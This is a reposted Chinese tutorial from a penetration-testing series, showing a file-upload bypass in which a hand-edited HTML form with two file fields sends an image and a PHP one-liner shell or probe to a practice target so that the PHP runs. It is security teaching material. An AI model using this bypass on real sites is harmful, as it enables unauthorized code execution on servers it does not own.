61.网络安全渗透测试—[文件上传篇11]—[双文件-突破上传]

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、程序逻辑出错:双文件突破上传

1、双文件上传:一个上传图片,一个上传php一句话

(1)自己对客户端上传页面进行修改,其中的action要跳转到题目链接

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <title>双文件上传示例</title>
    </head>
    
    <body>
        <form method="post" enctype="multipart/form-data" action="http://upload.moonteam.com/upload_10.php">
            filename1<input type="file" name="file">
            filename2<input type="file" name="file">
            <input type="submit" value="上传"/>
        </form>
    </body>
</html>

(2)打开自己修改的上传表单,上传一张图片和一个php探针 img (3)点击上传后,会跳转到题目链接,并且显示php探针上传成功!!! img (4)如下图所示:php探针成功解析执行 img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/119454437
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复